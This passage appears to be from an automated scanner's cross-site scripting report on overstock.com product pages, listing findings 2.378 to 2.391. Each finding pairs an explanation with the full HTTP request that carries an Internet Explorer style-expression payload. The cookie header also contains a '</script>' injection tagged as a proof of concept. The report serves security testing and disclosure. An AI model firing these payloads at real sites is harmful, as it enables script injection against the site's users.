GET /Home-Garden/Tommy-Hilfiger-American-Classics-Navy-3-piece-Comforter-Set/3987252/product.html?6cd96"style%3d"x%3aexpression(alert(1))"f09ac549513=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.378. http://www.overstock.com/Home-Garden/Tommy-Hilfiger-Luxury-Soft-2-piece-Bath-Mat-Set/3320594/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b11c6"style%3d"x%3aexpression(alert(1))"9451f409b44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b11c6"style="x:expression(alert(1))"9451f409b44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tommy-Hilfiger-Luxury-Soft-2-piece-Bath-Mat-Set/3320594/product.html?b11c6"style%3d"x%3aexpression(alert(1))"9451f409b44=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.379. http://www.overstock.com/Home-Garden/Tricod-Stainless-Steel-Tube-Solar-Light-Set-of-8/5111392/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288af"style%3d"x%3aexpression(alert(1))"e3deb707dae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 288af"style="x:expression(alert(1))"e3deb707dae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tricod-Stainless-Steel-Tube-Solar-Light-Set-of-8/5111392/product.html?288af"style%3d"x%3aexpression(alert(1))"e3deb707dae=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.380. http://www.overstock.com/Home-Garden/Turning-Point-Professional-139-piece-Home-Tool-Set/4463061/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1821"style%3d"x%3aexpression(alert(1))"5766c93c099 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1821"style="x:expression(alert(1))"5766c93c099 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Turning-Point-Professional-139-piece-Home-Tool-Set/4463061/product.html?e1821"style%3d"x%3aexpression(alert(1))"5766c93c099=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.381. http://www.overstock.com/Home-Garden/Tuscan-300-Thread-Count-Reversible-Duvet-Cover-Set/4798852/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a47"style%3d"x%3aexpression(alert(1))"9ecdf3a0d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6a47"style="x:expression(alert(1))"9ecdf3a0d54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tuscan-300-Thread-Count-Reversible-Duvet-Cover-Set/4798852/product.html?a6a47"style%3d"x%3aexpression(alert(1))"9ecdf3a0d54=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.382. http://www.overstock.com/Home-Garden/Tuscany-Villa-Bi-cast-Faux-Leather-King-sized-Sleigh-Bed/3867557/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9de"style%3d"x%3aexpression(alert(1))"7bd2a95823d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e9de"style="x:expression(alert(1))"7bd2a95823d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tuscany-Villa-Bi-cast-Faux-Leather-King-sized-Sleigh-Bed/3867557/product.html?8e9de"style%3d"x%3aexpression(alert(1))"7bd2a95823d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.383. http://www.overstock.com/Home-Garden/Two-Million-Candlelight-Spotlight-Lantern/3647055/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14324"style%3d"x%3aexpression(alert(1))"b17deb32d72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14324"style="x:expression(alert(1))"b17deb32d72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Two-Million-Candlelight-Spotlight-Lantern/3647055/product.html?14324"style%3d"x%3aexpression(alert(1))"b17deb32d72=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.384. http://www.overstock.com/Home-Garden/Ultra-soft-Heavyweight-German-Flannel-Sheet-Set/409649/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1dbb"style%3d"x%3aexpression(alert(1))"d66bba31e1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1dbb"style="x:expression(alert(1))"d66bba31e1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Ultra-soft-Heavyweight-German-Flannel-Sheet-Set/409649/product.html?d1dbb"style%3d"x%3aexpression(alert(1))"d66bba31e1b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.385. http://www.overstock.com/Home-Garden/Vigo-Atlantis-Tempered-Glass-Vessel-Sink/3442482/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 441b5"style%3d"x%3aexpression(alert(1))"00409e9962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 441b5"style="x:expression(alert(1))"00409e9962c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Vigo-Atlantis-Tempered-Glass-Vessel-Sink/3442482/product.html?441b5"style%3d"x%3aexpression(alert(1))"00409e9962c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.386. http://www.overstock.com/Home-Garden/Villa-Reversible-Down-Alternative-Comforter/4682150/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74016"style%3d"x%3aexpression(alert(1))"e5a85f99bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74016"style="x:expression(alert(1))"e5a85f99bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Villa-Reversible-Down-Alternative-Comforter/4682150/product.html?74016"style%3d"x%3aexpression(alert(1))"e5a85f99bf=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.387. http://www.overstock.com/Home-Garden/Virgo-2-door-Floor-Cabinet/4310738/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b2c"style%3d"x%3aexpression(alert(1))"d1ff3886bab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b2c"style="x:expression(alert(1))"d1ff3886bab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Virgo-2-door-Floor-Cabinet/4310738/product.html?66b2c"style%3d"x%3aexpression(alert(1))"d1ff3886bab=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.388. http://www.overstock.com/Home-Garden/Warmspun-Cozy-Plush-Queen-or-King-Electric-Blanket/4768185/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec57"style%3d"x%3aexpression(alert(1))"f65ef033490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fec57"style="x:expression(alert(1))"f65ef033490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Warmspun-Cozy-Plush-Queen-or-King-Electric-Blanket/4768185/product.html?fec57"style%3d"x%3aexpression(alert(1))"f65ef033490=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.389. http://www.overstock.com/Home-Garden/Warmspun-Cozy-Plush-Twin-or-Full-Electric-Blanket/4768183/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3987"style%3d"x%3aexpression(alert(1))"5224a347fcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3987"style="x:expression(alert(1))"5224a347fcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Warmspun-Cozy-Plush-Twin-or-Full-Electric-Blanket/4768183/product.html?f3987"style%3d"x%3aexpression(alert(1))"5224a347fcd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.390. http://www.overstock.com/Home-Garden/Waste-King-8000-1-HP-Garbage-Disposal/3458949/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8255f"style%3d"x%3aexpression(alert(1))"45414b55d64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8255f"style="x:expression(alert(1))"45414b55d64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Waste-King-8000-1-HP-Garbage-Disposal/3458949/product.html?8255f"style%3d"x%3aexpression(alert(1))"45414b55d64=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.391. http://www.overstock.com/Home-Garden/Wesley-Indoor-Outdoor-Portable-Fireplace/4247894/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 219b8"style%3d"x%3aexpression(alert(1))"08b342089de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 219b8"style="x:expression(alert(1))"08b342089de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
